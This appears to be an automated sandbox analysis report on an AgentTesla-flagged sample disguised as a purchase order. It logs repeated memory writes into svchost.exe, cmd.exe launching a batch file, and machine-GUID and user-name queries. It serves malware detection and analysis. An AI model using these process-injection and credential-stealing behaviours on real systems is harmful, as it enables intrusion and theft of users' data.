                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5A90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5AF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5B90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5BF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5C90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5CF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5D90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5DF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5E90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5ED0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5EF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F00000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F10000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F80000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5F90000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FA0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FB0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FC0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FD0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FE0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 5FF0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6000000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6010000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6020000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6030000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6040000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6050000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6060000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6070000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6080000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6090000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 60F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6100000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6110000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6120000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6130000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6140000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6150000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6160000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6170000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6180000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6190000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 61F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6200000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6350000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6360000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6370000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6380000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6390000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 63F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6400000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6410000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6420000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6430000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6440000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6450000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6460000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6470000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6480000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6490000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 64A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 64B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6600000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6610000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6620000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6630000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6640000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6650000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6660000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 67F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6800000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6810000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6820000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6830000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6840000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6850000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6860000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6870000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6880000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6890000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68E0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 68F0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6900000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6910000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6920000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6930000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6940000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6950000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6960000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6970000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6980000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6990000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69A0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69B0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69C0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 69D0000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B20000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B30000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B40000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B50000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 50480000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B60000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 6B70000
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeProcess created: C:\Users\user\Desktop\New Order PO20011046.exe C:\Users\user\Desktop\New Order PO20011046.exe
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Xzqvptso.bat' '
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: New Order PO20011046.exe, 0000000B.00000002.918866865.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,GetACP,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_50488A9C GetLocalTime,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeCode function: 11_2_020DBD8A GetUserNameW,
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_50485D8D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 0000000B.00000003.759372640.0000000000574000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921398684.0000000004B40000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920852349.00000000038E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.919758080.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.921099669.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: New Order PO20011046.exe PID: 1256, type: MEMORY
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.New Order PO20011046.exe.4a80000.1.unpack, type: UNPACKEDPE
